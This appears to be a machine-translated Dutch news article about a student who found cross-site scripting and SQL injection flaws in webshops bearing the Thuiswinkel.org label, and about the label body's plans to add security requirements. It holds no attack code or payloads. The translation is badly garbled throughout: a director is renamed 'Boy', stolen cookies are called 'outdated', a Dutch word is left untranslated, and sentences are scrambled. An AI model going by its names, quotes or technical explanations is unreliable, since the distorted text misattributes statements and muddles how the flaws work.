A 17-year-old student has in the course of two days vulnerabilities found on the web sites of 160 shops with a home Shopping.org-certificate. The organization behind the label says to pay more attention to security spending.
“I am the list of members of Thuiswinkel.org triggered in vulnerable shops,” says communicatiestudent Daniël Heesen. In total, the researcher 1200 stores checked. Heesen sets in 160 of those web sites leaks have been found. “I have each site in one place checked,” says the researcher. Most of it was in addition to the search field, in which he strings entered that vulnerabilities may indicate.
The vulnerabilities found were mainly cross site scripting vulnerabilities that cookies may be outdated and malicious code can be executed. For these vulnerabilities to actually exploit, a victim still be tempted to put on a specially prepared link. It’s going to be a relatively innocent vulnerability, but between the 143 websites that were predisposed for xss were, however, major online retailers, such as BelCompany, V&D and BCC.
Seriously were the 17 sql injection vulnerabilities that Heesen found. With sql injection, where user input as valid sql queries is interpreted, it can, in theory, an entire database can be ontfutseld. Among other things Baby-Dump.nl and Kabeltje.com contain such vulnerabilities, but these are now closed. “Some websites are still leak,” says Heesen, but a part of the stores has taken action.
“These are probably not the only leaks in shops, because for example, I’ve not checked on blind sql injections,” says Heesen. When blind sql injection is a web vulnerable to sql injection but the results of a command are not displayed. A hacker can then, via a detour to still execute commands.
The researcher’s findings reported to the foundation Thuiswinkel.org, which is a hallmark for webshops manages. Heesen focused in his research on shops with the home Shopping.org-stamp. The organization has affiliated merchants, after consultation with Tweakers.net Tuesday morning informed. Wijnand Jongen, director of Thuiswinkel.org says hoped that the research contributes to a better protection of online stores.
Heesen says that he as a result of a vulnerability in the web shop CheapTickets.nl were wondering what stores are even more leak. At CheapTickets.nl knew a hacker data 715.000 customers to steal. Boy says that his organization is already after the publication of that particular leak has decided to pay more attention to the security of online stores to spend. “We’ll check our members are not on security, but that is going to change,” said the Boy. “Security of web shops is a great thing.”
The requirements that merchants must meet in order to the home Shopping.org-mark to bear, to be complemented with requirements for safety. Thuiswinkels who does not comply with the requirements to keep, run the risk of been suspended or even be expelled. How the websites are controlled, is not yet known. Boy says that the organization still need to look at what ‘feasible’ is.